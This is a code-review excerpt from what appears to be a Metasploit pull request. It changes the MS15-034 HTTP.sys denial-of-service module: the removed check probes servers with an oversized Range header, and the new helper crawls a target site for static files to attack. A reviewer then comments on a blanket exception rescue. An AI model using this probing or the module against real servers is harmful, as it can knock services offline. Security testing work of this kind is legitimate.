modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb

```diff
@@ -111,25 +110,69 @@ def dos_host(ip)
     print_status("#{ip}:#{rport} - DOS request sent")
   end
 
+  def potential_static_files_uris
+    uri = normalize_uri(target_uri.path)
 
-  def check_host(ip)
-    return Exploit::CheckCode::Unknown if get_file_size(ip) == -1
+    return [uri] unless uri[-1, 1] == '/'
 
-    uri = normalize_uri(target_uri.path)
-    res = send_request_raw({
-      'uri' => uri,
-      'method' => 'GET',
-      'headers' => {
-        'Range' => "bytes=0-#{upper_range}"
-      }
-    })
-    if res && res.body.include?('Requested Range Not Satisfiable')
-      return Exploit::CheckCode::Vulnerable
-    elsif res && res.body.include?('The request has an invalid header name')
-      return Exploit::CheckCode::Safe
-    else
-      return Exploit::CheckCode::Unknown
+    uris = ["#{uri}welcome.png"]
+    res  = send_request_raw('uri' => uri, 'method' => 'GET')
+
+    return uris unless res
+
+    site_uri = URI.parse(full_uri)
+
+    Nokogiri::HTML(res.body).xpath('//link|//script|//style|//img').each do |tag|
+      %w(href src).each do |attribute|
+        begin
+          attr_value = tag[attribute]
+
+          next unless attr_value && !attr_value.empty?
+
+          uri = site_uri.merge(URI.encode(attr_value.strip))
+
+          next unless uri.host == vhost || uri.host == rhost
+
+          uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
+        rescue => e
```

Comment:
Swallowing all exceptions is not a good coding practice. Do you know if there's something particular you're trying to rescue? Maybe you shouldn't rescue at all?